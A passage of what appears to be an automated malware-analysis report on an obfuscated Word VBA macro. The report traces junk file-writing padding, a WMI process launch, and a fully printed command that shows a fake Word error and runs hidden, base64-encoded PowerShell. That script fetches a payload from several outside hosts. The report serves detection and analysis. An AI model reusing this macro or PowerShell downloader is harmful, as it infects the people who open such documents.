                                        Set IfdcD = sbLwDeWJ

                                        sbLwDeWJ

                                        106

                                        Set TjDNNFkVD = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        107

                                        Dim TOXmCsgb as Object

                                        108

                                        Set TOXmCsgb = TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY")

                                        CreateTextFile

                                        109

                                        TOXmCsgb.WriteLine "GqSFCtOyDYdfx"

                                        WriteLine

                                        110

                                        TOXmCsgb.WriteLine "QsixYFOXyEEAmh"

                                        WriteLine

                                        111

                                        TOXmCsgb.WriteLine "QxWCtMBxGzkkBAU"

                                        WriteLine

                                        112

                                        Set KFlvRoHB = JjBKEUXqH

                                        JjBKEUXqH

                                        113

                                        TOXmCsgb.Close

                                        Close

                                        114

                                        Set TjDNNFkVD = Nothing

                                        115

                                        Set WiXswI = GEopA

                                        GEopA

                                        116

                                        Set TOXmCsgb = Nothing

                                        116

                                        TOXmCsgb:

                                        118

                                        Set Tp28g8vd8ptrsy = CreateObject(J_gncosnr4av4lr)

                                        CreateObject("winmgmts:win32_process")

                                        executed
                                        119

                                        Goto yHxgEeJg

                                        120

                                        Dim AUZLIjCLH as Object

                                        121

                                        Set aCXYJWIHA = BuEcDJvc

                                        BuEcDJvc

                                        122

                                        Set AUZLIjCLH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        123

                                        Dim yHxgEeJg as Object

                                        124

                                        Set yHxgEeJg = AUZLIjCLH.CreateTextFile("LPJPJFI:\CTzVF\dLRZEH.maUZE")

                                        CreateTextFile

                                        125

                                        yHxgEeJg.WriteLine "RMNuAAEfwmHGkp"

                                        WriteLine

                                        126

                                        yHxgEeJg.WriteLine "YfIwYFFntmmdDsPv"

                                        WriteLine

                                        127

                                        yHxgEeJg.WriteLine "nbBVBbrmTJhR"

                                        WriteLine

                                        128

                                        Set vsASGFtA = JkICEEJbA

                                        JkICEEJbA

                                        129

                                        yHxgEeJg.Close

                                        Close

                                        130

                                        Set AUZLIjCLH = Nothing

                                        131

                                        Set VWiBw = hrqzdCF

                                        hrqzdCF

                                        132

                                        Set yHxgEeJg = Nothing

                                        132

                                        yHxgEeJg:

                                        134

                                        Ufvxqjlwai0p9fg8tc = Mid(sf4, (1 + 4), Len(sf4))

                                        Mid

                                        Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAA]anw[3gAH]anw[3MAZ]anw[3QBU]anw[3AC0]anw[3ASQ]anw[3B0A]anw[3EUA]anw[3TQA]anw[3gAC]anw[3AAd]anw[3gBh]anw[3AFI]anw[3AaQ]anw[3BBA]anw[3EIA]anw[3TAB]anw[3FAD]anw[3oAM]anw[3AA5]anw[3AFA]anw[3AIA]anw[3AgA]anw[3CgA]anw[3WwB]anw[3UAH]anw[3kAU]anw[3ABF]anw[3AF0]anw[3AKA]anw[3AiA]anw[3HsA]anw[3MAB]anw[39AH]anw[3sAM]anw[3wB9]anw[3AHs]anw[3AMg]anw[3B9A]anw[3HsA]anw[3MQB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BTA]anw[3HkA]anw[3JwA]anw[3sAC]anw[3cAY]anw[3wB0]anw[3AE8]anw[3Acg]anw[3BZA]anw[3CcA]anw[3LAA]anw[3nAC]anw[34Aa]anw[3QBv]anw[3AC4]anw[3ARA]anw[3BJA]anw[3HIA]anw[3RQA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3AHQ]anw[3AZQ]anw[3BNA]anw[3CcA]anw[3KQA]anw[3pAC]anw[3AAI]anw[3AA7]anw[3ACA]anw[3AIA]anw[3AgA]anw[3HMA]anw[3ZQB]anw[3UAC]anw[30Aa]anw[3QB0]anw[3AEU]anw[3ATQ]anw[3AgA]anw[3CgA]anw[3JwB]anw[3WAC]anw[3cAK]anw[3wAn]anw[3AEE]anw[3Acg]anw[3AnA]anw[3CsA]anw[3JwB]anw[3pAE]anw[3EAY]anw[3gBM]anw[3AEU]anw[3AOg]anw[3BhA]anw[3HYA]anw[3NQA]anw[3nAC]anw[3sAJ]anw[3wBM]anw[3ACc]anw[3AKw]anw[3AnA]anw[3G8A]anw[3UgA]anw[3nAC]anw[3kAI]anw[3AAg]anw[3ACg]anw[3AWw]anw[3B0A]anw[3FkA]anw[3cAB]anw[3lAF]anw[30AK]anw[3AAi]anw[3AHs]anw[3AMA]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NAB]anw[39AH]anw[3sAN]anw[3gB9]anw[3AHs]anw[3ANQ]anw[3B9A]anw[3HsA]anw[3MgB]anw[39AC]anw[3IAL]anw[3QBm]anw[3ACA]anw[3AJw]anw[3BTA]anw[3HkA]anw[3UwA]anw[3nAC]anw[3wAJ]anw[3wBl]anw[3AG0]anw[3ALg]anw[3BOA]anw[3GUA]anw[3VAA]anw[3uAF]anw[3MAZ]anw[3QBy]anw[3AHY]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3yAC]anw[3cAL]anw[3AAn]anw[3AEk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3YwB]anw[3lAH]anw[3AAb]anw[3wAn]anw[3ACw]anw[3AJw]anw[3B0A]anw[3E0A]anw[3YQB]anw[3uAG]anw[3EAZ]anw[3wAn]anw[3ACw]anw[3AJw]anw[3BJA]anw[3G4A]anw[3JwA]anw[3sAC]anw[3cAV]anw[3AAn]anw[3ACk]anw[3AIA]anw[3ApA]anw[3CAA]anw[3OwA]anw[3gAC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3ACc]anw[3AKw]anw[3AnA]anw[3GkA]anw[3bAB]anw[3lAG]anw[34AJ]anw[3wAp]anw[3ACs]anw[3AKA]anw[3AnA]anw[3HQA]anw[3bAB]anw[35AE]anw[3MAJ]anw[3wAr]anw[3ACc]anw[3Abw]anw[3BuA]anw[3HQA]anw[3JwA]anw[3pAC]anw[3sAJ]anw[3wBp]anw[3ACc]anw[3AKw]anw[3AoA]anw[3CcA]anw[3bgA]anw[3nAC]anw[3sAJ]anw[3wB1]anw[3AGU]anw[3AJw]anw[3ApA]anw[3CkA]anw[3OwA]anw[3kAE]anw[3QAO]anw[3AAx]anw[3AHY]anw[3AbA]anw[3A2A]anw[3GwA]anw[3PQA]anw[3kAF]anw[3AAM]anw[3QAy]anw[3AFI]anw[3AIA]anw[3ArA]anw[3CAA]anw[3WwB]anw[3jAG]anw[3gAY]anw[3QBy]anw[3AF0]anw[3AKA]anw[3A2A]anw[3DQA]anw[3KQA]anw[3gAC]anw[3sAI]anw[3AAk]anw[3AE8]anw[3AOQ]anw[3A4A]anw[3EUA]anw[3OwA]anw[3kAF]anw[3IAX]anw[3wAx]anw[3AFo]anw[3APQ]anw[3AoA]anw[3CcA]anw[3SwA]anw[3yAC]anw[3cAK]anw[3wAn]anw[3ADY]anw[3ARQ]anw[3AnA]anw[3CkA]anw[3OwA]anw[3gAC]anw[3AAK]anw[3ABH]anw[3AGM]anw[3AaQ]anw[3AgA]anw[3HYA]anw[3QQB]anw[3yAE]anw[3kAQ]anw[3QBC]anw[3AEw]anw[3AZQ]anw[3A6A]anw[3DAA]anw[3OQB]anw[3wAC]anw[3AAK]anw[3QAu]anw[3AFY]anw[3AQQ]anw[3BMA]anw[3HUA]anw[3ZQA]anw[36AD]anw[3oAI]anw[3gBD]anw[3AFI]anw[3ARQ]anw[3BhA]anw[3GAA]anw[3VAB]anw[3) -> 17453

                                        executed
                                        135

                                        Goto ApdWADYGV

                                        136

                                        Dim UjlQFBJj as Object

                                        137

                                        Set cTUpB = SYgbDdCEH

                                        SYgbDdCEH

                                        138

                                        Set UjlQFBJj = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        139

                                        Dim ApdWADYGV as Object

                                        140

                                        Set ApdWADYGV = UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB")

                                        CreateTextFile

                                        141

                                        ApdWADYGV.WriteLine "JNHUAINVrwxEKEHD"

                                        WriteLine

                                        142

                                        ApdWADYGV.WriteLine "EXrpEHndyyG"

                                        WriteLine

                                        143

                                        ApdWADYGV.WriteLine "TwoNCIGurJPYA"

                                        WriteLine

                                        144

                                        Set AFnzJ = IuDSasFIm

                                        IuDSasFIm

                                        145

                                        ApdWADYGV.Close

                                        Close

                                        146

                                        Set UjlQFBJj = Nothing

                                        147

                                        Set PzSZDA = LUJoKCCQ

                                        LUJoKCCQ

                                        148

                                        Set ApdWADYGV = Nothing

                                        148

                                        ApdWADYGV:

                                        150

                                        Goto eLNGd

                                        151

                                        Dim buKzFt as Object

                                        152

                                        Set ryExIJiIc = xDUMl

                                        xDUMl

                                        153

                                        Set buKzFt = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        154

                                        Dim eLNGd as Object

                                        155

                                        Set eLNGd = buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI")

                                        CreateTextFile

                                        156

                                        eLNGd.WriteLine "GApbBIepzWxnI"

                                        WriteLine

                                        157

                                        eLNGd.WriteLine "lkkOeHeJHjmGONABFI"

                                        WriteLine

                                        158

                                        eLNGd.WriteLine "lSOfQyhpoF"

                                        WriteLine

                                        159

                                        Set dUEpTnTJX = TFPJDBSa

                                        TFPJDBSa

                                        160

                                        eLNGd.Close

                                        Close

                                        161

                                        Set buKzFt = Nothing

                                        162

                                        Set NPOhCPGF = hKDFekFGF

                                        hKDFekFGF

                                        163

                                        Set eLNGd = Nothing

                                        163

                                        eLNGd:

                                        165

                                        Tp28g8vd8ptrsy.Create Slz39ct0lz_ksnd(Ufvxqjlwai0p9fg8tc), L_4bpvggv2vokj75, Nakuayuxnnrg5

                                        SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApACsAKAAnAFsAMwA6ACcAKwAnAC8AJwApACsAJwAvAHMAJwArACcAZQAnACsAKAAnAG8AJwArACcALgB1AGQAJwApACsAKAAnAGEAaQBwACcAKwAnAHUAcgBrAGEAcgAnACsAJwB0AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AcgB4AC0AJwArACcANQAnACsAJwA3ADAAMAAnACkAKwAnAC0ANgAnACsAKAAnAGgAbgByADcALwBTACcAKwAnAGcAbQBzACcAKwAnAC8AQAAnACkAKwAoACcAXQBhAG4AdwAnACsAJwBbADMAJwArACcAOgAvACcAKQArACcALwBwACcAKwAnAGgAdQAnACsAKAAnAG8AbgAnACsAJwBnACcAKQArACcAYQBwACcAKwAoACcAcAAnACsAJwBsAGUAJwApACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBtAGUAcwBzACcAKQArACcAZQAnACsAJwBuAGcAJwArACgAJwBlACcAKwAnAHIALQAnACkAKwAnAHMAbwAnACsAKAAnAHUAbgAnACsAJwBkACcAKQArACcALQA4ACcAKwAnAGsAdwAnACsAJwBrAHEAJwArACcALwBZACcAKwAoACcARgByADcALwBAACcAKwAnAF0AYQBuAHcAJwArACcAWwAnACkAKwAoACcAMwBzADoALwAvACcAKwAnAGIAJwApACsAKAAnAHIAJwArACcAZQB0ACcAKQArACcAdABzACcAKwAnAGgAYQAnACsAKAAnAHcAbQBhAGcAaQBjACcAKwAnAC4AYwBvAG0AJwArACcALwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBZAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwAnACsAJwBbADMAcwA6AC8ALwBjACcAKwAnAGEAJwArACcAZgBlAGMAZQBuACcAKwAnAHQAcgB,,) -> 0

                                        L_4bpvggv2vokj75

                                        Nakuayuxnnrg5

                                        executed
                                        166

                                        Goto hQCyFzF

                                        167

                                        Dim msoKFIIMI as Object

                                        168

                                        Set gJsfsb = IYlnG

                                        IYlnG

                                        169

                                        Set msoKFIIMI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        170

                                        Dim hQCyFzF as Object

                                        171

                                        Set hQCyFzF = msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF")

                                        CreateTextFile

                                        172

                                        hQCyFzF.WriteLine "ehJSnoaWvoCEfGL"

                                        WriteLine

                                        173

                                        hQCyFzF.WriteLine "uAYnHfspvFJ"

                                        WriteLine

                                        174

                                        hQCyFzF.WriteLine "GuEmEfvZLaJDIAX"

                                        WriteLine

                                        175

                                        Set ZQkkGq = nEFlbEa

                                        nEFlbEa

                                        176

                                        hQCyFzF.Close

                                        Close

                                        177

                                        Set msoKFIIMI = Nothing

                                        178

                                        Set kcuElHl = ClgfEDCg

                                        ClgfEDCg

                                        179

                                        Set hQCyFzF = Nothing

                                        179

                                        hQCyFzF:

                                        181

                                        Goto sPUjHbDB

                                        182

                                        Dim FijxC as Object

                                        183

                                        Set sewLMSSJg = UcUhFvH

                                        UcUhFvH

                                        184

                                        Set FijxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        185

                                        Dim sPUjHbDB as Object

                                        186

                                        Set sPUjHbDB = FijxC.CreateTextFile("DNCEiIDxC:\EYevg\MFdKF.RmyPCLa")

                                        CreateTextFile

                                        187

                                        sPUjHbDB.WriteLine "jyJEJqDCTEnyIA"

                                        WriteLine

                                        188

                                        sPUjHbDB.WriteLine "pIHMJANYJmFIe"

                                        WriteLine

                                        189

                                        sPUjHbDB.WriteLine "tZZjtwJRCQcVAD"

                                        WriteLine

                                        190

                                        Set HjcgHbA = ncXeGEGfF

                                        ncXeGEGfF

                                        191

                                        sPUjHbDB.Close

                                        Close

                                        192

                                        Set FijxC = Nothing

                                        193

                                        Set KzJMOvqoA = kIALACE

                                        kIALACE

                                        194

                                        Set sPUjHbDB = Nothing

                                        194

                                        sPUjHbDB:

                                        196

                                        End Function

                                        Function Slz39ct0lz_ksnd, APIs: 201, Strings: 20, Number of lines: 66, Relevance: 388.566
                                        APIsMeta Information

                                        yKTqX

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        PdhtG

                                        Close

                                        QAhNFQ

                                        WOdrGBJG

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        GPfHF

                                        Close

                                        hKjoxAHI

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Leedy8frqauxr

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: bzYfQcEHB

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: xZGeAsHP

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Close

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: naqcFCA

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Replace

